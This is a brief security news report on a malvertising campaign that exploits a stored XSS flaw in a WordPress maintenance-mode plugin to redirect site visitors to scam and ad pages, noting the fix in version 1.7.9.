loader gif

Attackers abuse XSS vulnerability in WordPress plugin to display malverts

Attackers abuse XSS vulnerability in WordPress plugin to display malverts
  • The XSS flaw allows an attacker to inject JavaScript or HTML code into the blog front-end of WordPress sites running the ‘Coming Soon Page & Maintenance Mode’ plugin version 1.7.8 or below.
  • This causes the compromised WordPress sites to display unwanted popup ads and redirect visitors to malicious landing pages, including tech support scams, malicious Android APKs, and pharmaceutical ads.

Wordfence's Defiant Threat Intelligence team observed an ongoing malvertising campaign that abuses stored cross-site scripting (XSS) vulnerability in the Coming Soon Page & Maintenance Mode WordPress plugin.

What is the vulnerability?

The XSS flaw allows an attacker to inject JavaScript or HTML code into the blog front-end of WordPress sites running the ‘Coming Soon Page & Maintenance Mode’ plugin version 1.7.8 or below.

This causes the compromised WordPress sites to display unwanted popup ads and redirect visitors to malicious landing pages, including tech support scams, malicious Android APKs, and pharmaceutical ads.

The JavaScript code used to infect the sites will load additional code from other third-party domains to develop a full malicious payload that gets executed when a visitor opens the infected website.

Once the payload executes in a visitor’s browser, an initial redirect is performed, redirecting the visitor to a new destination based on the type of device used by the visitor.

“The eventual destination sites vary in scope and intent. Some redirects land users on typical illegitimate ads for pharmaceuticals and pornography, while others attempt direct malicious activity against the user’s browser,” the researchers said.

XSS Attacks

The XSS injection attacks launched by the attackers are originating from IP addresses connected to popular hosting providers, obfuscated PHP shells with limited functionality. These attacks are performed by using a small array of compromised sites in order to hide the source of the activities.

The XSS flaw has been patched in the WordPress plugin version 1.7.9.

loader gif